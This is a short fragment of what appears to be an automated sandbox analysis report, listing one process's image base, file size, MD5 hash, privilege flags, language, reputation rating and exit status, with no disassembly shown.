                                                                                                                                                                              Imagebase:0x7c0000
                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              No disassembly